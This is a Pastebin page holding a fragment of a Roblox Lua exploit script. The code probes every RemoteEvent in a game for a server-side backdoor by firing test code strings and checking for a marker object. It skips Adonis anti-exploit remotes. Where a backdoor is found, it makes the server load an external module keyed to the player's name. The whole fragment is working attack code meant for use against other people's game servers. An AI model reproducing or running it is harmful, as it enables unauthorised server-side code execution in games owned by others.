AA122294

Untitled

May 10th, 2025
24
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.26 KB | None | 0 0
  1. if AlreadyScanned == false then
  2. AlreadyScanned = true
  3. local GenScript = function(Remote)
  4. return [[i=Instance.new("StringValue", workspace) i.Name="333555777YEET" i.Value="]]..tostring(Remote:GetFullName())..[["]]
  5. end
  6.  
  7.  
  8. local function hasKeyword(s)
  9. for _, keyword in ipairs(Skip) do
  10. if (s:find(keyword, 1, true)) then
  11. return true
  12. end
  13. end
  14. return false
  15. end
  16.  
  17. local function AntiAdonis(x)
  18. local ReturnValue = false
  19. if #x:GetChildren() ~= 0 then
  20. for _, v in pairs(x:GetChildren()) do
  21. if string.lower(v.Name) == "__function" then
  22. ReturnValue = true
  23. end
  24. end
  25. end
  26. return ReturnValue
  27. end
  28.  
  29.  
  30.  
  31. local CreateFile = function()
  32. local Remotes = game:GetDescendants()
  33.  
  34. for _,v in pairs(Remotes) do
  35. if v:IsA("RemoteEvent") and hasKeyword(v.Name) == false and not AntiAdonis(v) then
  36. Dict[tostring(v:GetFullName())] = v
  37. v:FireServer(GenScript(v))
  38. game:GetService("RunService").Stepped:Wait()
  39. end
  40. end
  41. return true
  42. end
  43.  
  44. CheckGood = CreateFile()
  45.  
  46. wait(1.5)
  47.  
  48. local WorkspaceInstance = workspace:GetChildren()
  49.  
  50. for _, v in pairs(WorkspaceInstance) do
  51. if v.Name == "333555777YEET" then
  52. local NewInstance = Dict[v.Value]
  53. v:Destroy()
  54. if RemoteBackdoor == nil then
  55. RemoteBackdoor = NewInstance
  56. AttachWindowDraggableFrame.Visible = false
  57. AttachWindowDraggableFrame.Active = false
  58. DraggableFrameMainFrame.Visible = true
  59. DraggableFrameMainFrame.Visible = true
  60. end
  61. end
  62. end
  63. if RemoteBackdoor == nil then
  64. wait(1.5)
  65. for _, v in pairs(WorkspaceInstance) do
  66. if v.Name == "333555777YEET" then
  67. local NewInstance = Dict[v.Value]
  68. v:Destroy()
  69. if RemoteBackdoor == nil then
  70. RemoteBackdoor = NewInstance
  71. AttachWindowDraggableFrame.Visible = false
  72. AttachWindowDraggableFrame.Active = false
  73. DraggableFrameMainFrame.Visible = true
  74. DraggableFrameMainFrame.Visible = true
  75. end
  76. end
  77. end
  78. end
  79. end
  80. if RemoteBackdoor == nil then
  81. showHint("Rayfield", "No backdoor found")
  82. else
  83. RemoteBackdoor:FireServer([[require(4823191136):mml("]]..LP.Name..[[")]])
  84. end
  85. end)
Advertisement
Add Comment
Please, Sign In to add comment